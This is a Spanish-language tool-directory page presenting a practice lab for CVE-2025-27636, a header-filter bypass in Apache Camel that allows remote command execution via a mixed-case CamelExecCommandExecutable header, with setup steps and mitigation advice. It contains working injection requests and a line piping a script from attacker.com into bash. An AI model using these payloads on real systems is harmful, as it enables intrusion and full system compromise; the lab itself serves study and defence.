Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-27636-Practical-Lab — Laboratorio práctico para reproducir CVE-2025-27636, un RCE crítico en Apache Camel mediante una omisión del filtro de encabezados que distingue mayúsculas y minúsculas. Demuestra la inyección de encabezados para ejecutar comandos arbitrarios a través del endpoint exec. | Kitploit
Herramientas/GitHubGitHub/enochgitgamefied/cve-2025-27636-practical-lab
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónLabs y Práctica
GitHubenochgitgamefied/cve-2025-27636-practical-lab

CVE-2025-27636-Practical-Lab

Laboratorio práctico para reproducir CVE-2025-27636, un RCE crítico en Apache Camel mediante una omisión del filtro de encabezados que distingue mayúsculas y minúsculas. Demuestra la inyección de encabezados para ejecutar comandos arbitrarios a través del endpoint exec.

Ver Repositorio
2hace 10 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🛡️ CVE-2025-27636 — Laboratorio Práctico de Explotación para Apache Camel

🔍 Resumen

CVE-2025-27636 es una vulnerabilidad crítica de Ejecución Remota de Código (RCE) en Apache Camel, específicamente en el componente camel-exec. Surge de un problema sutil pero peligroso:

DefaultHeaderFilterStrategy realiza comprobaciones que distinguen entre mayúsculas y minúsculas en los nombres de los encabezados, lo que puede eludirse utilizando mayúsculas/minúsculas alternativas.

Esto significa que los encabezados internos de Camel, como CamelExecCommandExecutable, que deberían bloquearse, pueden colarse si se manipula su uso de mayúsculas/minúsculas (por ejemplo, cAmeLexecCommandExecutable).

Cuando este encabezado llega al endpoint exec:, un atacante puede inyectar comandos arbitrarios, lo que lleva a un compromiso total del sistema.


📌 Antecedentes Técnicos

✅ DefaultHeaderFilterStrategy

El DefaultHeaderFilterStrategy de Apache Camel está diseñado para proteger encabezados internos como:

  • CamelHttp*
  • CamelFile*
  • CamelExecCommandExecutable ← 🚨 vulnerable si el uso de mayúsculas/minúsculas elude el filtro

🔍 ¿Qué Significa "Interno"?

Los encabezados internos son:

  • Prefijados con Camel*
  • Usados solo dentro de Camel para controlar el comportamiento (enrutamiento, procesamiento, endpoints)
  • No están destinados a exponerse a sistemas externos como HTTP, JMS, etc.

Sin embargo, antes del parche, este filtro coincidía con los nombres de los encabezados distinguiendo entre mayúsculas y minúsculas, lo que viola la especificación HTTP (donde los encabezados no distinguen entre mayúsculas/minúsculas) y permite eludirlo de la siguiente manera:

root@kitploit:~
GET /systeminfo HTTP/1.1
Host: target-ip:8484
cAmeLexecCommandExecutable: /bin/bash -c "touch /tmp/pwned"

Este encabezado se pasaría al componente exec:, que luego ejecuta la carga útil.

🛠️ CamelExecCommandExecutable

Este encabezado le dice al componente camel-exec qué comando ejecutar. Es poderoso—y extremadamente peligroso—si es controlable por el usuario, especialmente en entornos que soportan comandos a nivel de sistema operativo (por ejemplo, bash, cmd.exe, etc.).


🧪 Laboratorio Práctico: Diagnóstico del Servidor Pinewood

Proyecto: Pinewood Server Diagnostic Autor: @enochgitgamefied Objetivo: Reproducir CVE-2025-27636 en un laboratorio educativo en vivo.


🔗 Repositorio de GitHub

👉 https://github.com/enochgitgamefied/CVE-2025-27636-Pratctical-Lab


📁 Resumen del Proyecto

  • Construido con Apache Camel 4.10.0
  • Rutas:
    • /tasks → Lista tareas usando exec:tasklist o exec:ps
    • /systeminfo → Muestra información del SO (systeminfo o uname -a)
    • /network → Muestra ipconfig o ifconfig
  • Interfaz web servida en / usando Jetty embebido
  • Vulnerable a inyección de encabezados con mayúsculas/minúsculas modificadas si el filtrado no está parcheado

⚙️ Primeros Pasos

root@kitploit:~
# Clone the repository
git clone https://github.com/enochgitgamefied/CVE-2025-27636-Pratctical-Lab.git
cd CVE-2025-27636-Pratctical-Lab

# Package the app
mvn clean package

# Run it
java -jar target/hello-camel-1.0-SNAPSHOT.jar

Luego visita en tu navegador:

🖥️ http://<your-ip>:8484


🚨 Demostración de la Vulnerabilidad

Comportamiento sin parche:

Si envías un encabezado como este (observa las mayúsculas/minúsculas):

root@kitploit:~
cAmeLexecCommandExecutable: whoami

El filtro no lo bloquea y se pasa al endpoint exec:. Puedes demostrar:

  • whoami
  • uname -a
  • bash -c "curl http://attacker.com/shell.sh | bash" ← peligroso

🎥 Demo de YouTube

Se está preparando una demostración completa y se subirá pronto. Recorrerá:

  • Configuración de la aplicación
  • Inyección de encabezados
  • Ejecución de comandos
  • Pasos de remediación

Enlace de la demo en YouTube https://www.youtube.com/watch?v=z4Xf9LYXc9o&t=714s!


🛡️ Mitigación y Corrección

  1. Actualiza Apache Camel a una versión con filtrado de encabezados que no distinga entre mayúsculas y minúsculas (esto está parcheado).
  2. Usa un HeaderFilterStrategy personalizado si debes aplicar una lógica más estricta.
  3. No expongas rutas exec: directamente a HTTP a menos que estén completamente aseguradas.

🧠 Conclusiones Clave

  • Los encabezados internos nunca deben ser controlables por usuarios externos.
  • La distinción entre mayúsculas/minúsculas en los filtros de seguridad es un antipatrón bien conocido.
  • Apache Camel es potente, pero con ese poder viene responsabilidad—especialmente al encadenar HTTP a exec.

⚠️ Aviso Legal

Este laboratorio está diseñado solo para fines educativos y de laboratorio controlado. Nunca intentes esto en sistemas o redes no autorizados.

Apache Camel2
Descargar herramienta